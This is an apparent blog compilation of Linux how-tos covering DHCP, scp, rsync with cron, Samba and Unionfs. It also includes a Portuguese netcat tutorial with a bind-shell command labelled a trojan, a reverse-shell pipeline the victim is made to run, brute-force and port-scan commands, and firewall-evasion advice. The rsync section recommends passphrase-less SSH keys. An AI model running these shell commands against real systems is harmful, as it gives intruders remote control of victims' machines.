Wednesday, July 23, 2008

Configure a Linux DHCP Server

Configure a DHCP Server


Introduction

Normally if you have a cable modem or DSL, you get your home PC's IP address dynamically assigned from your service provider. If you install a home cable/DSL router between your modem and home network, your PC will most likely get its IP address at boot time from the home router instead. You can choose to disable the DHCP server feature on your home router and set up a Linux box as the DHCP server.

This chapter covers only the configuration of a DHCP server that provides IP addresses. The configuration of a Linux DHCP client that gets its IP address from a DHCP server is covered in Chapter 3, "Linux Networking", on Linux Networking.
Download and Install the DHCP Package

Most RedHat and Fedora Linux software products are available in the RPM format. Downloading and installing RPMs aren't hard. If you need a refresher, Chapter 6, "Installing Linux Software", covers how to do this in detail.

When searching for the file, remember that the DHCP server RPM's filename usually starts with the word dhcp followed by a version number like this: dhcp-3.0.1rc14-1.i386.rpm.

Debian Note: With Debian / Ubuntu the package name may include a version number. Use the dpkg --list | grep dhcp command to get a list of all your dhcp packages and use the output to infer what the DHCP server package name would be. In this case we can guess that the package name should be dhcp3-server. If you need a DEB package installation refresher you can take a look at Chapter 6, "Installing Linux Software".

root@u-bigboy:/tmp# dpkg --list | grep dhcp
ii dhcp3-client 3.0.3-6ubuntu7 DHCP Client
ii dhcp3-common 3.0.3-6ubuntu7 Files used by all the dhcp3* packages
root@u-bigboy:/tmp#

The /etc/dhcpd.conf File

When DHCP starts, it reads the file /etc/dhcpd.conf. It uses the commands here to configure your network. The standard DHCP RPM package doesn't automatically install a /etc/dhcpd.conf file, but you can find a sample copy of dhcpd.conf in the following directory which you can always use as a guide.

/usr/share/doc/dhcp-/dhcpd.conf.sample

You have to copy the sample dhcpd.conf file to the /etc directory and then you'll have to edit it. Here is the command to do the copying for the version 3.0p11 RPM file:

[root@bigboy tmp]# cp /usr/share/doc/dhcp-3.0pl1/dhcpd.conf.sample /etc/dhcpd.conf

Debian Note: With Debian / Ubuntu the configuration file name is /etc/dhcp*/dhcpd.conf and has the same syntax as that used by Redhat / Fedora.

Here is a quick explanation of the dhcpd.conf file: Most importantly, there must be a subnet section for each interface on your Linux box.



ddns-update-style interim
ignore client-updates

subnet 192.168.1.0 netmask 255.255.255.0 {

# The range of IP addresses the server
# will issue to DHCP enabled PC clients
# booting up on the network

range 192.168.1.201 192.168.1.220;

# Set the amount of time in seconds that
# a client may keep the IP address

default-lease-time 86400;
max-lease-time 86400;

# Set the default gateway to be used by
# the PC clients

option routers 192.168.1.1;
# Don't forward DHCP requests from this
# NIC interface to any other NIC
# interfaces

option ip-forwarding off;

# Set the broadcast address and subnet mask
# to be used by the DHCP clients

option broadcast-address 192.168.1.255;
option subnet-mask 255.255.255.0;

# Set the DNS server to be used by the
# DHCP clients

option domain-name-servers 192.168.1.100;

# Set the NTP server to be used by the
# DHCP clients

option nntp-server 192.168.1.100;

# If you specify a WINS server for your Windows clients,
# you need to include the following option in the dhcpd.conf file:

option netbios-name-servers 192.168.1.100;

# You can also assign specific IP addresses based on the clients'
# ethernet MAC address as follows (Host's name is "laser-printer":

host laser-printer {
hardware ethernet 08:00:2b:4c:59:23;
fixed-address 192.168.1.222;
}
}
#
# List an unused interface here
#
subnet 192.168.2.0 netmask 255.255.255.0 {
}

There are many more options statements you can use to configure DHCP. These include telling the DHCP clients where to go for services such as finger and IRC. Check the dhcp-options man page after you do your install:

[root@bigboy tmp]# man dhcp-options

Note: The host statement seen in the sample dhcpd.conf file can be very useful. Some devices such as network printers default to getting their IP addresses using DHCP, but users need to access them by a fixed IP address to print their documents. This statement can be used to always provide specific IP address to DHCP queries from a predefined a NIC MAC address. This can help to reduce systems administration overhead.



How to Get DHCP Started

To get DHCP started:

1) Some older Fedora/RedHat versions of the DHCP server will fail unless there is an existing dhcpd.leases file. Use the command touch /var/lib/dhcp/dhcpd.leases to create the file if it does not exist.

[root@bigboy tmp]# touch /var/lib/dhcp/dhcpd.leases

2) Use the chkconfig command to get DHCP configured to start at boot:

[root@bigboy tmp]# chkconfig dhcpd on

With Debian / Ubuntu the equivalent command for the dhcp3-server package would be:

root@u-bigboy:/tmp# sysv-rc-conf dhcp3-server on

3) Use the service command to instruct the /etc/init.d/dhcpd script to start/stop/restart DHCP after booting

[root@bigboy tmp]# service dhcpd start
[root@bigboy tmp]# service dhcpd stop
[root@bigboy tmp]# service dhcpd restart

With Debian / Ubuntu the equivalent commands would be:

root@u-bigboy:/tmp# /etc/init.d/dhcp*-server start
root@u-bigboy:/tmp# /etc/init.d/dhcp*-server stop
root@u-bigboy:/tmp# /etc/init.d/dhcp*-server restart

4) Remember to restart the DHCP process every time you make a change to the conf file for the changes to take effect on the running process. You also can test whether the DHCP process is running with the following command; you should get a response of plain old process ID numbers:

[root@bigboy tmp]# pgrep dhcpd

5) Finally, always remember to set your PC to get its IP address via DHCP.




DHCP Servers with Multiple NICs (Network Interfaces)

When a DHCP configured PC boots, it requests its IP address from the DHCP server. It does this by sending a standardized DHCP broadcast request packet to the DHCP server with a source IP address of 255.255.255.255.

If your DHCP server has more than one interface, you have to add a route for this 255.255.255.255 address so that it knows the interface on which to send the reply; if not, it sends it to the default gateway. (In both of the next two examples, we assume that DHCP requests will be coming in on interface eth0).

Note: More information on adding Linux routes and routing may be found in Chapter 3, "Linux Networking".

Note: You can't run your DHCP sever on multiple interfaces because you can only have one route to network 255.255.255.255. If you try to do it, you'll discover that DHCP serving working on only one interface.



Temporary Solution

You can temporarily add a route to 255.255.255.255 using the route add command as seen below.

[root@bigboy tmp]# route add -host 255.255.255.255 dev eth0

If you want this routing state to be maintained after a reboot, then use the permanent solution that's discussed next.


Permanent Solution

The new Fedora Linux method of adding static routes doesn't seem to support sending traffic out an interface that's not destined for a specific gateway IP address. The DHCP packet destined for address 255.255.255.255 isn't intended to be relayed to a gateway, but it should be sent using the MAC address of the DHCP client in the Ethernet frame.

You have one of two choices. Add the route add command to your /etc/rc.local script, or add an entry like this to your /etc/sysconfig/static-routes file.

#
# File /etc/sysconfig/static-routes
#
eth0 host 255.255.255.255

Note: The /etc/sysconfig/static-routes file is a deprecated feature and Fedora support for it will eventually be removed.

Now that you have configured your server, it's time to take a look at the DHCP clients.



Configuring Linux Clients to Use DHCP

A Linux NIC interface can be configured to obtain its IP address using DHCP with the examples outlined in , "Linux Networking". Please refer to this chapter if you need a quick refresher on how to configure a Linux DHCP client.



Configuring Windows Clients to Use DHCP

Fortunately Windows defaults to using DHCP for all its NIC cards so you don't have to worry about doing any reconfiguration.
Using a Single DHCP Server to Serve Multiple Networks

As stated before, DHCP clients send their requests for IP addresses to a broadcast address which is limited to the local LAN. This would imply that a DHCP server is required on each subnet. Not so. It is possible to configure routers to forward DHCP requests to a DHCP server many hops away. This is done by inserting the IP address of the router's interface on the DHCP client's network into the forwarded packet. To the DHCP server, the non-blank router IP address field takes precedence over the broadcast address and it uses this value to provide a DHCP address that is meaningful to the client. The DHCP server replies with a broadcast packet, and the router, which has kept track of the initial forwarded request, forwards it back towards the client. You can configure this feature on Cisco devices by using the ip helper-address command on all the interfaces on which DHCP clients reside. Here is a configuration sample that points to a DHCP server with the IP address 192.168.36.25:

interface FastEthernet 2/1
ip address 192.168.1.30 255.255.255.0
ip helper-address 192.168.36.25



Simple DHCP Troubleshooting

The most common problems with DHCP usually aren't related to the server; after the server is configured correctly there is no need to change any settings and it therefore runs reliably. The problems usually occur at the DHCP client's end for a variety of reasons. The following sections present simple troubleshooting steps that you can go through to ensure that DHCP is working correctly on your network.



DHCP Clients Obtaining 169.254.0.0 Addresses

Whenever Microsoft DHCP clients are unable to contact their DHCP server they default to selecting their own IP address from the 169.254.0.0 network until the DHCP server becomes available again. This is frequently referred to as Automatic Private IP Addressing (APIPA). Here are some steps you can go through to resolve the problem:

* Ensure that your DHCP server is configured correctly and use the pgrep command discussed earlier to make sure the DHCP process is running. Pay special attention to your 255.255.255.255 route, especially if your DHCP server has multiple interfaces.
* Give your DHCP client a static IP address from the same range that the DHCP server is supposed to provide. See whether you can ping the DHCP server. If you cannot, double-check your cabling and your NIC cards.
* DHCP uses the BOOTP protocol for its communication between the client and server. Make sure there are no firewalls blocking this traffic. DHCP servers expect requests on UDP port 67 and the DHCP clients expect responses on UDP port 68.



Conclusion

In most home-based networks, a DHCP server isn't necessary because the DSL router / firewall usually has DHCP capabilities, but it is an interesting project to try. Just remember to make sure that the range of IP addresses issued by all DHCP servers on a network doesn't overlap because it could possibly cause unexpected errors. You might want to disable the router/firewall's DHCP server capabilities to experiment with your new Linux server.

A DHCP server may be invaluable in an office environment where the time and cost of getting a network engineer to get the work done may make it simpler for Linux systems administrators to do it by themselves.

Creating a Linux DHCP server is straightforward and touches all the major themes in the previous chapters. Now it's time to try something harder, but before we do, we'll do a quick refresher on how to create the Linux users who'll be using many of the applications outlined in the rest of the book.


Taken From: "http://www.linuxhomenetworking.com/wiki/index.php/Quick_HOWTO_:_Ch08_:_Configuring_the_DHCP_Server"

Scp - Secure File Transfer (using ssh) Between UNIX Machines

Scp - Secure File Transfer (using ssh) between UNIX machines

Introduction and setup

Scp is a utility which allows files to be copied between machines. Scp is an updated version of an older utility named Rcp. It works the same, except that information (including the password used to log in) is encrypted. Also, if you have set up your .shosts file to allow you to ssh between machines without using a password as described in help on setting up your .shosts file, you will be able to scp files between machines without entering your password.
Usage of the Scp Command



The general form of the command is:

$ scp source-specification destination-specification

where source-specification indicates which file or directory is to be copied, and destination-specification indicates where the copied material is to be placed.

Either the source or the destination may be on the remote machine; i.e., you may copy files or directories into the account on the remote system OR copy them from the account on the remote system into the account you are logged into.



Example:

$ scp myfile xyz@sdcc7:myfile


To copy a directory, use the -r (recursive) option. Example:

$ scp -r mydir xyz@sdcc7:mydir



File Specification Formats

The format for the remote specification (source or destination) is:

user@machine:filename

where filename is the name (path) of the file or directory relative to the home (login) directory on the remote system.



The format for file specification on the local system is just:

filename


where fname is the name (path) relative to the current working directory on that system.
How scp is similar to cp

Just like the cp command, scp will overwrite an existing destination file. In addition, if the destination is an existing directory, the copied material will be placed beneath the directory.
Examples of remote file copies

1. While logged into xyz on sdcc7, copy file "letter" into file "application" in remote account abc on sdcc3:

$ scp letter abc@sdcc3:application


2. While logged into abc on sdcc3, copy file "foo" from remote account xyz on sdcc7 into filename "bar" in abc:

$ scp xyz@sdcc7:foo bar


3. While logged into account xyz on sdcc7, copy file "garfield" from subdirectory "comix" into filename "fatcat" in subdirectory "stuff" in remote account abc on sdcc3:

$ scp comix/garfield abc@sdcc3:stuff/fatcat


4. While logged into account abc on sdcc3, copy file "garfield" from subdirectory "comix" of account xyz on sdcc7 into subdirectory "stuff" with the same name "garfield":

$ scp xyz@sdcc7:comix/garfield stuff


5. While logged into account abc on sdcc3 , copy subdirectory "Section" into a new subdirectory called "Section" in existing subdirectory "Chapter" in account xyz on sdcc7:

$ scp -r Section xyz@sdcc7:Chapter


6. From account abc on sdcc3, copy entire account to ir123 on iacs5. This needs to be done from the parent directory of the account to be moved.

$ cd
$ cd ..
$ scp -r abc ir123@iacs5:abc



For more information about the scp (secure copy) command, check the on-line manual page for scp:

$ man scp

Backups With Rsync Using SSH and Cron

Sincronize Folders With Rsync Using SSH and Cron

Looking for how to set up RSync over SSH so that you can run it in a cron job, or without entering a password?

It's actually very simple. Just follow these few steps:


Step 1
As the user you are going to be running rsync as, and on the machine you will be running rsync on, type:

  # ssh-keygen -t rsa

Follow the prompts and use the defaults for the filenames it gives you. Don't enter in a passphrase, otherwise you will still be prompted for a password when trying to connect.

You should then have two new files in path_to_user_home/.ssh, id_rsa and id_rsa.pub.


Step 2
Open path_to_user_home/.ssh/id_rsa.pub and copy the text to the end of path_to_user_home/.ssh/authorized_keys file on the host you will be connecting to as the user you will be logging in as.

ex:in bash you can do it like this:
cat id_dsa.pub >> .ssh/authorized_keys

Note: if /.ssh/ or authorized_keys dont exist create them, this hapened to me in cygwin,
where i had to create .ssh/ and inside it i created the authorized_keys


Step 3
Now try it out. Try ssh'ing from the host you created the id_rsa* files on to the one you added a text to the end of the authorized_keys file. You won't be prompted for a password any more.


Step 4
Now you can use, cron (see Configuring a Cron Task below) to schedule rsync tasks using ssh, because you don't need to prompt the password



Configuring a Cron Task

The main configuration file for cron, /etc/crontab, contains the following lines:

SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/


# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly

The first four lines are variables used to configure the environment in which the cron tasks are run. The value of the SHELL variable tells the system which shell environment to use (in this example the bash shell), and the PATH variable defines the path used to execute commands. The output of the cron tasks are emailed to the username defined with the MAILTO variable. If the MAILTO variable is defined as an empty string (MAILTO=""), email will not be sent. The HOME variable can be used to set the home directory to use when executing commands or scripts.

Each line in the /etc/crontab file has the format:

    *minute   *hour    *day    *month    *dayofweek   *command


minute — any integer from 0 to 59
hour — any integer from 0 to 23
day — any integer from 1 to 31 (must be a valid day if a month is specified)
month — any integer from 1 to 12 (or the short name of the month such as jan, feb, and so on)
dayofweek — any integer from 0 to 7 where 0 or 7 represents Sunday (or the short name of the week such as sun, mon, and so on)
command — the command to execute. The command can either be a command such as ls /proc >> /tmp/proc or the commandcustom script that you wrote.

For any of the above values, an asterisk (*) can be used to specify all valid values. For example, an asterisk for the month value means execute the command every month within the constraints of the other values.

A hyphen (-) between integers specifies a range of integers. For example, 1-4 means the integers 1, 2, 3, and 4.

A list of values separated by commas (,) specifies a list. For example, 3, 4, 6, 8 indicates those four specific integers.

The forward slash (/) can be used to specify step values. The value of an integer can be skipped within a range by following the range with /. For example, 0-59/2 can be used to define every other minute in the minute field. Step values can also be used with an asterisk. For instance, the value */3 can be used in the month field to run the task every third month.

Any lines that begin with a hash mark (#) are comments and are not processed.


crontab
---------------------------------------------------------------

SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/

# run custom script the first day of every month at 4:10AM
10 4 1 * * /




your_scripts_dir



/backup.sh


# run-parts
01 * * * * root run-parts /etc/cron.hourly
31 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly










backup.sh
---------------------------------------------------------------

echo "+================================+"  >> /root/.rsync.log
echo "Syncrhonization Attempt Started At:" >> /root/.rsync.log
date >> /your_log_dir/.rsync.log

rsync --delete -avz "/source_dir/"  -e ssh username@remote_machine_ip_or_dns_name:/destination_dir

echo "---------------------------------" >> /root/.rsync.log
echo "
Syncrhonization Attempt Ended At" >> /root/.rsync.log



date >> /root/.rsync.log


As you can see from the /etc/crontab file, it uses the run-parts script to execute the scripts in the /etc/cron.hourly, /etc/cron.daily, /etc/cron.weekly, and /etc/cron.monthly files on an hourly, daily, weekly, or monthly basis respectively. The files in these directory should be shell scripts.

If a cron tasks needs to be executed on a schedule other than hourly, daily, weekly, or monthly, it can be added to the /etc/cron.d directory. All files in this directory use the same syntax as /etc/crontab.

The cron daemon checks the etc/crontab file, the etc/cron.d/ directory, and the /var/spool/cron directory every minute for any changes. If any changes are found, they are loaded into memory. Thus, the daemon does not need to be restarted if a crontab file is changed.

Users other than root can configure cron tasks by using the crontab utility. All user-defined crontabs are stored in the /var/spool/cron directory and are executed using the usernames of the users that created them. To create a crontab as a user, login as that user and type the command crontab -e to edit the user's crontab using the editor specified by the VISUAL or EDITOR environment variable. The file uses the same format as /etc/crontab. When the changes to the crontab are saved, the crontab is stored according to username and written to the file /var/spool/cron/username.
Starting and Stopping the Service

To start the cron service, use the command /sbin/service crond start. To stop the service, use the command /sbin/service






Netcat - O Canivete Suíco do TCP/IP (in Portuguese/BR)

Autor: tom bishop
Data: 16/03/2005

Introduzindo-lhes

O netcat é um programa para consultoria de redes muito conhecido, isso deve-se ao fato de ele ser um programa muito versátil, podendo desde ser um simples telnet até uma ferramenta de brute-force. A seguir explicaremos como obtê-lo e nas páginas seguintes, seu funcionamento e como que ele faz isso.


Obtendo o canivete-suíço

A maioria das distribuições Linux já vem com o netcat instalado, outras vem com ele pré-instalado. Caso sua distribuição ainda não tenha o netcat, você pode obtê-lo em www.securityfocus.com e www.packetstormsecurity.net.

Para chamar o programa, basta o simples comando:

$ nc

Grupos de discussão sobre o Netcat estão em securityfocus.com e no Yahoo! (pelo menos são os que eu participo).

Na página seguinte, veremos a teoria, ou seja como ele funciona.



Como o Netcat funciona

A princípio o Netcat foi lançado para ser um telnet aprimorado. Até então a única utilidade que ele teria seria se conectar a um host. E eu te garanto, até hoje a única coisa que ele faz é isso mesmo, se conectar a um host. Mas aí você me pergunta: "Mas no começo do artigo você disse que ele poderia servir para escanear hosts e fazer brute-forces?"

Para responder à essa pergunta, vamos voltar ao nosso eletrizante episódio sobre o como o Netcat nasceu. Como já dito, ele nasceu para se conectar à hosts, nisso, consultores do mundo inteiro alertaram para a AtStake (fundação que mantinha o Netcat) que opções como listen, redirecionamento de dados e criação de logs poderiam ser incluídas no programa, de forma a não alterar sua principal funcionalidade, a conexão.

Agora, eu faço uma pergunta: "Como que é realizado o brute-force?"

O brute-force é o método de tentativa de obtenção de senhas utilizado quando um cliente se conecta a um host e tenta se logar, utilizando uma seqüência de senhas que estão em um arquivo. Ou seja, se eu pegar o Netcat, que nada mais é do que um telnet aprimorado, eu posso me CONECTAR ao host e com uma linha de comando, posso completar o comando com a comparação para obtenção das senhas. Como veremos mais adiante o comando ficaria assim:

$ nc -vv 79 < /home/tzbishop/wordlist.txt > /home/tzbishop/lognc.txt

Da mesma forma, para escanear um host, basta mandar o Netcat se conectar a todas as portas do computador analisado, assim primeiro ele se certificará de quais as portas abertas que ele pode estabelecer contato.

Respondida a nossa perguntinha do começo da página.

Veja a seguir a sintaxe de utilização do Netcat...



Utilizando o Netcat

Esta parte será prática, mas sempre utilizando os conceitos já aprendidos anteriormente.

O Netcat é chamado com o comando "nc", você pode tanto dar as sintaxes depois do nc, quanto na linha "CMD LINE" que aparece após o comando "nc" simples.

Para listar as sintaxes disponíveis no Netcat, digite:

$ nc -h

Agora vamos traduzir as sintaxes para o português para o melhor compreendimento de todos:

* -l = coloca uma porta em estado de listenning (escuta);
* -p = define uma porta;
* -v = ativa o recebimento de eco;
* -vv = ativa o recebimento de eco. Mostra mais detalhes que -v;
* -u = utiliza o protocolo UDP ao invés de TCP;
* -t = para se conectar a TELNET;
* -o = gera um log em formato hexadecimal;
* -w = determina um tempo máximo para aguardar uma reposta;
* -e = redireciona arquivos;
* -n = recebe e faz conexões apenas em formato numérico (IP);


É mais do que óbvio que comandos e sintaxes do Linux podem ser misturadas, assim como a utilização de pipes( | ), <, > e >>.

Veremos agora, a versatilidade e utilização dos comandos em ação:



1) Conectando-se a um host

É feita da mesma maneira que o telnet. É especificado apenas um host e a porta a se conectar. Exemplos:

$ nc mail.yahoo.com.br 110
$ nc www.terra.com.br 80

Lembrando que a porta 110 é dos servidores de POP3 e a 80 é para web.



2) Abrindo uma porta (listenning)

É utilizada a sintaxe -l para colocar em listenning e -vv para retornar eco com detalhes. A seguir é estipulada a porta:

$ nc -l -p 53 -vv

Será retornada uma mensagem:

"listenning on [any] 53 ... "



3) Escaneando portas com o Netcat

Será feita uma tentativa de conexão à um IP ou host e será estipulada as portas da tentativa de conexão:

$ nc -vv www.vivaolinux.com.br 110 80 139
$ nc -vv www.vivaolinux.com.br 1-10000

No primeiro exemplo serão escaneadas apenas as portas 110 (POP3), 80 (web) e 139 (compartilhamento do Windows).

Já no segundo exemplo serão escaneadas desde a porta 1 até a 10000.



4) Abrindo a porta, dando entrada para um "shell" (=Trojan)

Será colocada a porta X em listenning, redirecionaremos a saída de dados para um shell (/bin/bash). Assim quando alguém se conectar a essa porta terá domínio total sobre o computador. Funciona de forma semelhante a um trojan.

$ nc -l -e /bin/bash -p 1033



5) Realizando um brute-force

Na página anterior eu já disponibilizei a sintaxe, ou seja, como se faz. Veja a sintaxe novamente:

$ nc -vv 79 < ~/wordlists.txt > bruteforce.log

Perceba, que conectaremos a porta do FINGER(79) e redirecionaremos o conteúdo do arquivo wordlists.txt para essa porta. Quando algum resultado for válido ele será salvo em bruteforce.log para uma análise posterior dos resultados.



6) Fazendo um sniffer

Além de tudo isto demonstrado acima, o 'amazing' Netcat ainda pode capturar todo o tráfego de uma rede. Eu acho que você já sabe como fazer isso se observar os redirecionamentos utilizados no exemplo anterior. Mas vamos lá.

Iremos nos conectar a uma porta e mandar o netcat "dar eco" nela, ou seja, exibir TUDO o que passa por ela. Após isso, é só redirecionar tudo o que o Netcat gravou para um arquivo. Veja a sintaxe, para melhor compreensão:

$ nc -vv -L 127.0.0.1 -p 80 > ~/sniffer.log



Fazendo uma conexão reversa com o netcat

A conexão reversa é um método de invasão parecida com os trojans, porém ocorre de maneira contrária, ou seja, não será o invasor que se conectará ao host, mas o host se conectará ao invasor, concedendo-lhe poderes administrativos. O mais surpreendente é que utilizando a imaginação, podemos fazer isso com o Netcat. Vamos relembrar as características aprendidas do Netcat:


* Abrir portas;
* Estabelecer conexão;
* Redirecionar tráfego de uma porta para um programa.


Sabendo disso, vamos tomar um IP fictício de exemplo = 200.212.21.2. O que teremos que fazer é abrir uma porta em nosso computador local e fazer, executando um código arbitrário no computador da vítima, com que ela se conecte ao nosso computador e nos conceda poderes em sua máquina. Vamos no modo gráfico e abriremos duas janelas, abrindo as portas 53 e 79:

$ nc -l -n -p 53 -vv
$ nc -l -n -p 79 -vv

Após isso, faremos com que a vítima execute o seguinte código no computador dela:

$ nc 53 | /bin/bash | nc 79

Isso fará com que os comandos que nós dermos na porta 53, passem pelo shell bash e a resposta seja redirecionada na porta 79.

Lembrando que as portas 53 e 79 foram utilizadas, pois o firewall deixa essas portas abrirem, pois são de consultas DNS e FINGER respectivamente.



Finalizando

Como vimos, o Netcat é realmente um canivete suíço e pode ser utilizado para diversos fins, desde a análise de redes por administradores competentes até a invasão de computadores e redes. Mas não é só isso que o Netcat é capaz de fazer, com um pouco de imaginação, você vai descobrindo mais truques e uma série de coisas estão disponíveis neste maravilhoso programa.

Aqui termina o meu artigo, espero que ele tenha sido útil para todos que o leram.

Qualquer dúvida postem aqui no artigo mesmo ou mande um email para tzbishop2k at yahoo.es que terei prazer em respondê-los.

Abraços à todos!

Mais links para aprendizado:

Samba Client on Linux (Windows Network Folders)

Samba Client

By : Julien Herbin Email : jam@ecranbleu.org
Don't hesitate to contact me in case you need any information. Please inform me of any mistake I may have done.
Last modified : 2004-24-01

This Howto will show you how to browse a Microsoft Windows shared directory and then mount it on your local Linux filesystem using SAMBA (http://www.samba.org/).
This Howto was written for the Debian Linux distribution, because packages management and dependencies is easy and commonplace through the APT command. It doesn't mean that the configuration won't work with another Linux distribution, since packages to install should be the same, but some configuration files may be located in another directories of your filesystem.



Installation
Installing the packages
First login as root in order to get the required packages.
You need to install both samba-common and smbclient packages. If you are using a Debian distribution, then type in :


$ apt-get install smbclient


Maybe another packages will be installed since smbclient depends "samba-common, libc6, libcupsys2, libncurses5, libpam0g, libreadline4".
Others will have to get those package installed another way (RPM for RedHat and Mandrake for instance).

If you indent to mount windows shares directly on your filesystem, install the smbfs package. Note that to do such a thing, you will need to include "SMB Network FilesSystem" to your kernel or to your modules. Just check the "SMB file system support" item in the "Filesystem => Network Filesystem" menu. Then rebuild you kernel and reboot, or rebuild you modules and that's all ;).
For Debian users, then type in :


$ apt-get install smbfs


Others will have to get this package installed another way.



Configuration

Now that install is complete, you should be asked your desired Workgroup / Domain Name. You should enter here the same workgroup (usually "mshome" by default on win2k and win XP).

Then you will be asked if you want to use password encryption. Answer yes.

Finally, answer yes to use WINS settings from DHCP if you have a Windows DHCP server running on a computer of your network (note that the package "dhcp3-client" should be installed on you system to get this feature work correctly).


Altering the configuration file

In case you need to change the configuration you setted up just after installation, just edit the "/etc/samba/smb.conf" file.



Doing some tests

Shares directories browsing
Let's check that your installation is successfull and do a first browsing test.
My computer "Fraise" runs a Windows XP Home Edition with the guest login on. So, i don't have to worry about a username/password to get to access my shared directories. If you do need a username/password, then add " -U your_username". Your password should be asked when press enter.

$ smbclient -L network_name_of_your_windows_computer

If your computer is called "fraise", then enter :

$ smbclient -L fraise

A password will be asked to you. If you set one on your Windows computer, then enter it now.

The result should look like the following :


[15:03:24][jam@cerise] ~$ smbclient -L fraise
Password:

Sharename Type Comment
--------- ---- -------
IPC$ IPC Distant IPC
print$ Disk Printers Drivers
D Disk
hpdeskje Printer hp deskjet 845c
UtilZ Disk My read only shared directory
Upload Disk My read/write shared directory

Server Comment
--------- -------

Workgroup Master
--------- -------


Example of a manual mount
Now, lets assume the package "smbfs" is correctly installed and your kernel or your modules include the "smbfs driver". We are going to mount the "UtilZ" and the "Upload" directories from the computer called "Fraise".


cd /mnt
mkdir smb_UtilZ_on_Fraise
mkdir smb_Upload_on_Fraise


Now try :

mount -t smb //fraise/UtilZ /mnt/smb_UtilZ_on_Fraise

if it says unknown filesystem (as it says on Fedora 6) try:

mount -t cifs //fraise/UtilZ /mnt/smb_UtilZ_on_Fraise


Note that if you compiled "smb file system driver" as a module, it should load automaticaly :



[13:08:19][root@cerise] /mnt# lsmod
Module Size Used by
smbfs 68760 2



Automatic mount a startup

If the last step was successfull, you should not meet any kind of problem here. Here are the lines to add to your "fstab" configuration file (usually located in "/etc"). The last two lines are responsible for the two shared directories mountage on startup.
The first one is mounted read-only whereas the second one is mounted read-write. If you have need "user name/password" to authentifiate, then add in the "" column "username=your_user_name,password=your_password,ro,user".


//fraise/UtilZ /mnt/smb_UtilZ_on_Fraise smbfs password=,ro,fmask=755,dmask=755 0 0

//fraise/Upload /mnt/smb_Upload_on_Fraise smbfs password=,fmask=777,dmask=777 0 0


if it says unknown filesystem (as it says on Fedora 6) or dosent work try:


//fraise/UtilZ /mnt/smb_UtilZ_on_Fraise cifs password=,ro,fmask=755,dmask=755 0 0

//fraise/Upload /mnt/smb_Upload_on_Fraise cifs
password=,fmask=777,dmask=777 0 0


You can set up your own options to give permissions on files and directories. For example, it is possible to assign au uid or a gid to the files and directories
Type "man smbmount" to get more details on options



GUI Browsing
If you feel like using a GUI to manage your Samba mounts, you can use the program LinNeighborhood (http://www.bnro.de/~schmidjo/index.html).

Run as root :


$ apt-get install smb4k


To start the program, type in your favorit X console :

$ smb4k

Please refer to program's homepage to get information.

Install and Use Unionfs ( Merging Directories )

Howto: How Install and Use Unionfs (Merging Directories)

Unionfs, developed at Stony Brook university since 2004, is a stackable unification file system, which can merge the contents of several directories (so called branches) while keeping their physical content separate. It allows any mix of read-only and read-write branches, as well as insertion and deletion of branches on the fly. Unionfs can be used in several ways, for example to unify home directories from multiple filesystems on different disk partitions, or to merge several CDs to create a unified view of a photo archive. In a similar view, Unionfs, with copy-on-write functionality, can be used to merge read-only and read-write filesystems together and to virtually allow modification of read-only filesystems saving changes to the writable ones.

SLAX is a 177 MB Linux Live distribution which aims at compacting full featured Linux operating system to a portable medium (like usb flash drive or mini-cd) and allows everyone to boot Linux on any machine without the need to install it. It works even on computers with no harddisk at all. Unionfs is the most important part of a SLAX, it allows SLAX to seem and act as a real Linux OS with full-writable root directory tree. So let's speak about unionfs first.

Getting started
To get unionfs working, you need to create a Linux kernel module by compiling its source codes. Unionfs is available as a module extension for Linux Kernel 2.4.20 / 2.6.9 and higher. Download the latest version from FTP and extract the content of the archive by using

$ tar -xzf unionfs-x-y-z.tar.gz

Then cd to its directory and read README and INSTALL files which are part of the archive. There are many instructions how to avoid problems. Before the compilation itself, you might find it useful to know that it's possible to disable compiling debug information together with the module. Debug info is useful for reporting bugs, but significantly increases the size of kernel module. Two parameters must be set to disable debug at all:

* create a file called fistdev.mk in the directory with sources
* add this text to it:

EXTRACFLAGS=-DUNIONFS_NDEBUG
UNIONFS_DEBUG_CFLAG=

The compiled kernel module will be about 90 KB big without debug info, compared to 5 MB with it (you can download fistdev.mk used to compile unionfs for SLAX)

Another important thing to make the compilation work properly is to download and extract sources for your running kernel and to modify LINUXSRC variable in unionfs' Makefile, adding path where you actually extracted it (this can be autodetected in some cases).

Finally, use the following commands to build and install unionfs module into /lib/modules/$(KernelVersion)/kernel/fs/unionfs:

$ make
$ make install
$ depmod -a

Using unionfs

In the following example, we will merge contents of two directories into a single directory /mnt/union. We assume that all directories already exist.

$ modprobe unionfs
$ mount -t unionfs -o dirs=/mnt/cdrom1=ro:/mnt/cdrom2=ro unionfs /mnt/union

From now, the directory /mnt/union will contain all files and directories from /mnt/cdrom1 and /mnt/cdrom2, merged together and both read only. If the same filename is used in both cdrom directories, the one from cdrom1 has precedence (because it was specified leftmost in the list).
Using unionctl

Unionctl is a tool which is created (together with uniondbg) during unionfs compilation and is installed to /usr/local/sbin. Unionctl is intended to manage the existing union, to list, add, modify or delete existing branches. Some simple example follows, use unionctl command without any argument to see all available options.

To list branches in existing union, use

$ unionctl /mnt/union --list

which will produce the following output

/mnt/cdrom1 (r-)
/mnt/cdrom2 (r-)


To add another directory (/mnt/cdrom3) into existing union, use

$ unionctl /mnt/union --add --after /mnt/cdrom2 --mode ro /mnt/cdrom3

and unionctl --list will now produce

/mnt/cdrom1 (r-)
/mnt/cdrom2 (r-)
/mnt/cdrom3 (r-)


In the case when you change the content of branches themselves, execute the following command to force revalidation of the union:

uniondbg -g /mnt/union


Writing to union

Merging read-only directories is useful in many cases, but the union itself remains read-only too, until a read-write branch is added to it. In that case, all changes are stored in leftmost branch (using copy-up method, see below) and file deletions are done by using one of the two methods available:

- WHITEOUT mode, inserts a .wh (whiteout) file to mask out a real file
- DELETE_ALL mode, tries to delete all instances of a file from all branches

